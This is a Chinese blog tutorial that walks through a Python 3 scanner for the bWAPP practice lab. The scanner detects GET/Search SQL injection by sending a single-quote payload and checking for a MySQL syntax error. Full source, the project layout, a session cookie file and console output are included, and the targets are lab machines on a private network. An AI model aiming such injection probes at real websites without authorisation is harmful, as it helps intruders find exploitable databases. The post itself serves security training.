热门标签
热门文章
- 1 ALL Torrent Sites!_one piece robin hentai黑条汉化
- 202-有关C语言scanf()函数使用%s时的小问题_scanf语句里面有逗号会出现什么情况
- 3集五福2 python_集五福python编程题
- 4项目管理概论【项目管理基础-第一章 项目与项目管理】_项目管理是以项目为对象的系统管理方法,通过一个临时性的专门的柔性组织,对项目进
- 5python集合(set)(2)_定义两个集合set1={1,2,3,5,6,3,2},set2={2,5,7,9} 中两个集合一共有
- 6Cortex-M3学习(1)-官方启动文件分析_cortex-m3官方
- 7一文理解class.getClassLoader().getResourceAsStream(file)和class.getResourceAsStream(file)区别
- 8使用码云代码托管服务
- 9eclipse的配置、快捷键、项目导入导出、常见的插件或代码生成器工具_如何导出eclipse 所有设置
- 10java日期和时间戳格式互转_时间戳转换日期格式java
当前位置: article > 正文
python3---项目bwapp--对2017年的OWASP TOP 10中A1 injection sql 注入(get/search)进行Python3脚本实现_wapp2.top
作者:从前慢现在也慢 | 2024-02-10 18:02:14
赞
踩
wapp2.top
python3—项目bwapp–对2017年的OWASP TOP 10中A1 injection sql 注入(get/search)进行Python3脚本实现
1、项目背景
服务器BWAPP平台:
在192.168.40.248机器上搭建了bwapp的安全测试系统
http://192.168.40.248/bWAPP/sqli_1.php
可以成功访问并可以进行安全测试
客户端:kali linux 192.168.40.181
安装了python3.6,当中包括的库有
ssl bs4 json redis urllib pexpect termcolor hashlib telnetlib pymysql pymongo
项目的所有文件在客户端上创建(所有的文件权限是755)
touch xxx.py
chmod 755 -R xxx.py
touch xxx.txt
chmod 755 -R xxx.txt
mkdir xxxx- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
2、项目描述
2.1、项目涉及的所有文件–根目录
root@kali:~/bwapp# tree /root/bwapp
/root/bwapp
├── bWAPP.py
├── cookies.txt
├── injection
│ ├── __init__.py
│ ├── injectionmain.py
│ ├── __pycache__
│ │ ├── __init__.cpython-36.pyc
│ │ └── injectionmain.cpython-36.pyc
│ └── SQL_injection
│ ├── __init__.py
│ ├── __pycache__
│ │ ├── __init__.cpython-36.pyc
│ │ └── SQL_injection_get_search.cpython-36.pyc
│ └── SQL_injection_get_search.py
├── pocdb.py
└── __pycache__
└── pocdb.cpython-36.pyc
5 directories, 12 files
root@kali:~/bwapp#
文件描述:
根目录:
bWAPP.py是主脚本代码文件
cookies.txt文件是保存每次登陆最新的cookies信息
injection是文件夹,该文件夹是指owasp top 10中注入类的漏洞,文件夹下包含各类注入类漏洞
pocdb.py是梳理OWASP TOP 10中所有类的漏洞类型,每一种漏洞类型下具体到每一个子实际漏洞对应自己定义的class类的字典
__pycache__是一个空文件夹,只是缓存临时信息
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
bWAPP.py脚本代码
root@kali:~/bwapp# cat bWAPP.py
#!/usr/bin/python3.6
# --*-- coding;utf-8 --*--
'''
Aythor:xuweibo
description:bWAPP'main
data:Creat in 2018-05-16
'''
import os
import sys
import io
import re
import time
import requests
import warnings
import termcolor
from termcolor import cprint
from urllib.parse import urlparse
from injection.injectionmain import *
from pocdb import pocdb_pocs
from multiprocessing import Pool
from multiprocessing.dummy import Pool as ThreadPool
warnings.filterwarnings("ignore")
sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')
SEARCH_HISTORY = dict()
#Version No. is :
VERSION = 'v1.0'
FLAGLET = '''
\-\ /-/ /-/ /-/-\ |-|-----------| |-|-------------|
|-| \ \ / / \ / / / / \ \ | |---------| | | |-----------| |
| | \ \ / / \ \ / / / / \ \ | | | | | | | |
| |_________\ \ / / \ \ / / / / \ \ | |_________| | | |___________| |
|_________ |\ \ / / \ \ / / / /_______\ \ | |___________| | |_____________|
| | | \ \ / / \ \ / / / __________ \ | | | |
|_________| | \ \ / \ \/ / / / \ \ | | | |
|___________| \_/ \_\/ /-/ \ \|-| |-|
'''
#print ("123")
threads_num = 10
#并行任务池
injectionpool = ThreadPool(threads_num)
def injectionprint(injectionname):
msg = ">>>Testing injection vulns...."
sys.stdout.write(msg+injectionname+" "*(len(msg)+10)+"\n")
sys.stdout.flush()
time.sleep(0.5)
def injectioncheck(injectionpoc):
injectionpoc.run()
def injectionpoc_check(injectionurl):
poc_class = pocdb_pocs(injectionurl)
poc_dict = poc_class.injectionpocdict
cprint(">>>Injection漏洞测试URL:"+injectionurl+"\t可用POC个数["+str(len(poc_dict))+"]", "magenta")
injectionpool.map(injectionprint, poc_dict.keys())
print ("\n")
results = injectionpool.map(injectioncheck, poc_dict.values())
injectionpool.close()
injectionpool.join()
def bWAPPMain(checkurl):
try:
#执行injection的测试漏洞poc检测
injectionpoc_check(checkurl)
except Exception as e:
print (e)
cprint(">>>>>>>>>>>>>>>>>>超时","cyan")
if __name__ == '__main__':
usage=FLAGLET+'''
使用bWAPP平台进行2017年的OWASP TOP 10 WEB安全漏洞演练
opt:
------------------------------------------------------------------------
-h Get help
-u Url
-l List avalible pocs
------------------------------------------------------------------------
Usage:
1.python3.6 bWAPP.py -u http://www.example.com 对URL执行所有POC检测(暴力)
2.python3.6 bWAPP.py -l 列出所有的POC
'''+'\nVersion is : '+VERSION
#print (usage)
if len(sys.argv) < 2 or sys.argv[1]=="-h":
cprint(usage,"blue")
elif sys.argv[1] == "-l":
#列出injction POC的名称
pocclass = pocdb_pocs("")
injectionclass = pocclass.injectionpocdict
print("\t\t\tInjection POC")
for injection in injectionclass:
print("|"+injection+" ")
print("|-------------------------------------------------|")
print("\r")
elif sys.argv[1] == "-u" and sys.argv[2]:
bWAPPMain(sys.argv[2])
else:
bWAPPMain(sys.argv[1])
root@kali:~/bwapp# - 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
- 74
- 75
- 76
- 77
- 78
- 79
- 80
- 81
- 82
- 83
- 84
- 85
- 86
- 87
- 88
- 89
- 90
- 91
- 92
- 93
- 94
- 95
- 96
- 97
- 98
- 99
- 100
- 101
- 102
- 103
- 104
cookie.txt文本内容
root@kali:~/bwapp# cat cookies.txt
PHPSESSID=4c0d4229f5d980eae7cb9a5551957209; security_level=0
root@kali:~/bwapp# - 1
- 2
- 3
- 4
- 5
pocdb.py的脚本代码内容
root@kali:~/bwapp# ls
bWAPP.py cookies.txt injection pocdb.py __pycache__
root@kali:~/bwapp# cat pocdb.py
#!/usr/bin/python3.6
# --*-- coding:utf-8 --*--
'''
name:poc's diction
author:xuweibo
descript:entry of main's API
'''
from injection.injectionmain import *
#是梳理OWASP TOP 10中所有类的漏洞类型,每一种漏洞类型下具体到每一个子实际漏洞名称(测试页面展示)对应自己定义的class类的字典
class pocdb_pocs:
def __init__(self,url):
self.url = url
self.injectionpocdict = {
"SQL injection(GET/Search)":SQL_injection_get_search_BaseVerify(url)
}
root@kali:~/bwapp# - 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
2.2、项目涉及的所有文件–injection目录
root@kali:~/bwapp# cd injection/
root@kali:~/bwapp/injection# tree /root/bwapp/injection/
/root/bwapp/injection/
├── __init__.py
├── injectionmain.py
├── __pycache__
│ ├── __init__.cpython-36.pyc
│ └── injectionmain.cpython-36.pyc
└── SQL_injection
├── __init__.py
├── __pycache__
│ ├── __init__.cpython-36.pyc
│ └── SQL_injection_get_search.cpython-36.pyc
└── SQL_injection_get_search.py
3 directories, 8 files
root@kali:~/bwapp/injection#
root@kali:~/bwapp/injection# ls
__init__.py injectionmain.py __pycache__ SQL_injection
root@kali:~/bwapp/injection#
文件描述:
injection目录:
__init__.py是空的脚本文件
injectionmain.py是指注入类漏洞下具体的注入漏洞调用该漏洞的class
__pycache__是一个空的文件夹,缓存临时信息
SQL_injection是SQL注入的文件夹- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
injectionmain.py的脚本内容
root@kali:~/bwapp/injection# ls
__init__.py injectionmain.py __pycache__ SQL_injection
root@kali:~/bwapp/injection# cat injectionmain.py
#!/usr/bin/python3.6
# --*-- coding:utf-8 --*--
#是指在目录injection下的SQL_injection.SQL_injection_get_search.py脚本文件导入自己的class类
from injection.SQL_injection.SQL_injection_get_search import SQL_injection_get_search_BaseVerify
root@kali:~/bwapp/injection# - 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
2.3、项目涉及的所有文件–SQL-injection目录
root@kali:~/bwapp/injection# cd SQL_injection/
root@kali:~/bwapp/injection/SQL_injection# tree /root/bwapp/injection/SQL_injection/
/root/bwapp/injection/SQL_injection/
├── __init__.py
├── __pycache__
│ ├── __init__.cpython-36.pyc
│ └── SQL_injection_get_search.cpython-36.pyc
└── SQL_injection_get_search.py
1 directory, 4 files
root@kali:~/bwapp/injection/SQL_injection#
文件描述:
SQL-injection目录:
__init__.py是空的脚本文件
__pycache__是一个空的文件夹,缓存临时信息
SQL_injection_get_search.py是指SQL注入类漏洞中的get/search具体漏洞POC代码- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
SQL_injection_get_search.py脚本代码内容
root@kali:~/bwapp/injection/SQL_injection# cat SQL_injection_get_search.py
#!/usr/bin/python3.6
# --*-- coding:utf-8 --*--
'''
name:injection SQL_injection SQL_injection_get_search.php (GETY/SEARCH)SQL注入
author:xuwiebo
description:文件SQL_injection_get_search.php中存在Get/Search的SQL注入
'''
import sys
import requests
import warnings
from termcolor import cprint
class SQL_injection_get_search_BaseVerify:
def __init__(self, url):
self.url = url
def run(self):
headers = {"User-Agent":" Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
payload = "?title=1%27&action=search"
vulnurl = self.url + payload
#print(vulnurl)
cookies = {}
#参考https://www.v2ex.com/t/97347
f = open("/root/bwapp/cookies.txt","r")#读取根目录下的cookies信息
for line in f.read().split(";"):
name,value=line.strip().split("=",1)
cookies[name]=value
f.close()
try:
req = requests.get(vulnurl,cookies=cookies)
#print(req.url)
#print(req.status_code)
#print(req.text)#打印请求回包内容
if r"You have an error in your SQL syntax" in req.text:
cprint("[+]该页面SQL_injection_get_search.php 存在SQL注入漏洞...(高危)\nplyload: "+vulnurl, "red")
except:
cprint("[-] "+__file__+"===================>连接超时","cyan")
if __name__ == "__main__":
warnings.filterwarnings("ignore")
testVuln = SQL_injection_get_search_BaseVerify(sys.argv[1])
testVuln.run()
root@kali:~/bwapp/injection/SQL_injection# - 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
3、实际运行情况
root@kali:~/bwapp/injection/SQL_injection# cd ..
root@kali:~/bwapp/injection# cd ..
root@kali:~/bwapp# clear
root@kali:~/bwapp# python3.6 bWAPP.py -u http://192.168.40.248/bWAPP/sqli_1.php
>>>Injection漏洞测试URL:http://192.168.40.248/bWAPP/sqli_1.php 可用POC个数[1]
>>>Testing injection vulns....SQL injection(GET/Search)
[+]该页面SQL_injection_get_search.php 存在SQL注入漏洞...(高危)
plyload: http://192.168.40.248/bWAPP/sqli_1.php?title=1%27&action=search
root@kali:~/bwapp# - 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
root@kali:~/bwapp# python3.6 bWAPP.py
\-\ /-/ /-/ /-/-\ |-|-----------| |-|-------------|
|-| \ \ / / \ / / / / \ \ | |---------| | | |-----------| |
| | \ \ / / \ \ / / / / \ \ | | | | | | | |
| |_________\ \ / / \ \ / / / / \ \ | |_________| | | |___________| |
|_________ |\ \ / / \ \ / / / /_______\ \ | |___________| | |_____________|
| | | \ \ / / \ \ / / / __________ \ | | | |
|_________| | \ \ / \ \/ / / / \ \ | | | |
|___________| \_/ \_\/ /-/ \ \|-| |-|
使用bWAPP平台进行2017年的OWASP TOP 10 WEB安全漏洞演练
opt:
------------------------------------------------------------------------
-h Get help
-u Url
-l List avalible pocs
------------------------------------------------------------------------
Usage:
1.python3.6 bWAPP.py -u http://www.example.com 对URL执行所有POC检测(暴力)
2.python3.6 bWAPP.py -l 列出所有的POC
Version is : v1.0
root@kali:~/bwapp# - 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
root@kali:~/bwapp# python3.6 bWAPP.py -h
\-\ /-/ /-/ /-/-\ |-|-----------| |-|-------------|
|-| \ \ / / \ / / / / \ \ | |---------| | | |-----------| |
| | \ \ / / \ \ / / / / \ \ | | | | | | | |
| |_________\ \ / / \ \ / / / / \ \ | |_________| | | |___________| |
|_________ |\ \ / / \ \ / / / /_______\ \ | |___________| | |_____________|
| | | \ \ / / \ \ / / / __________ \ | | | |
|_________| | \ \ / \ \/ / / / \ \ | | | |
|___________| \_/ \_\/ /-/ \ \|-| |-|
使用bWAPP平台进行2017年的OWASP TOP 10 WEB安全漏洞演练
opt:
------------------------------------------------------------------------
-h Get help
-u Url
-l List avalible pocs
------------------------------------------------------------------------
Usage:
1.python3.6 bWAPP.py -u http://www.example.com 对URL执行所有POC检测(暴力)
2.python3.6 bWAPP.py -l 列出所有的POC
Version is : v1.0- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
root@kali:~/bwapp# python3.6 bWAPP.py -l
Injection POC
|SQL injection(GET/Search)
|-------------------------------------------------|
- 1
- 2
- 3
- 4
- 5
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/从前慢现在也慢/article/detail/74865
推荐阅读
相关标签
